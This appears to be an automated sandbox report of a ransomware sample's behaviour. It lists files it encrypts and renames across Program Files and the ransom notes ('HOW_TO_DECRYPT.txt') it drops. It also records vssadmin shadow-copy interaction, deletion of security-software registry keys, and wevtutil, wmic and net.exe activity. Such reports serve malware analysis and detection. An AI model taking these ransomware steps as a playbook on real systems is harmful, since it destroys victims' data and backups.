File opened for modification C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_dyaGuwabpNs0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\rtscom.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\Edit.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\OneConnectStoreLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleLargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-fullcolor.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_export_18.svg.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_xyh3bqLBoj00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodicon.gif.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_DT8gmlDPxs80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN114.XML.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_AyboSrubyHk0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_Gx6bLA604BQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-72.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000009\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\micaut.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\OutlookMailLargeTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_aGt355PdleY0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8EN.LEX.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_uJC3zTt1R6U0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\PopUp\Pop_up_Question.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-black\MedTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-white\MedTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_C7Oi-IGAebA0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Buttons\GiveUp\GiveUp-up.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.targetsize-256.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\vlc.mo.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_IgiqCt1ydmI0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7316_20x20x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\ja-jp\ui-strings.js.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_x_EINBwB1400.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookSmallTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_tqc4gfHE5L80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\en-US\msader15.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_zh_CN.jar.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_Rt5h0WYPiYY0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Icon.targetsize-48.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ES-ES.respack C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\SampleCompetitor1.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-40_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7da.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ja-JP\IPSEventLogMsg.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_OEM_Perp-ul-oob.xrm-ms.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_37CdesbNVg80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsLargeTile.contrast-white_scale-100.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-30.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\new_icons_retina.png.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_vzwtiMuR0L00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\Roses.jpg C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_3DbSZJVAvd00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_OEM_Perp-ul-oob.xrm-ms.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_8tTYAPgMy-w0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Resources\GetSMDL2.ttf C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1849_40x40x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.scale-100.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\print_poster.png.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_5sKry0KusNM0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\sl\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msadcer.dll.mui.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_glhD06VSBrg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-queries.xml.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_JJUzqqHyoE40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-ul-oob.xrm-ms.FhkzrnnOpmyt36tMphmBljnjHaE4jwN993DrcflseAP_P1ttnl4oqDM0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\1250_48x48x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2875_48x48x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-72.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8080_36x36x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2210_48x48x32.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Livetiles\MicrosoftSolitaireMedTile.scale-200.jpg C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 432 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1304 wrote to memory of 2800 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1304 wrote to memory of 2800 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1304 wrote to memory of 2800 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3476 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3476 wrote to memory of 2308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3476 wrote to memory of 2308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3476 wrote to memory of 2308 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 3940 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 3940 wrote to memory of 2660 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3940 wrote to memory of 2660 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3940 wrote to memory of 2660 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 432 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 432 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe C:\Windows\SysWOW64\net.exe
PID 1436 wrote to memory of 2184 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1436 wrote to memory of 2184 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
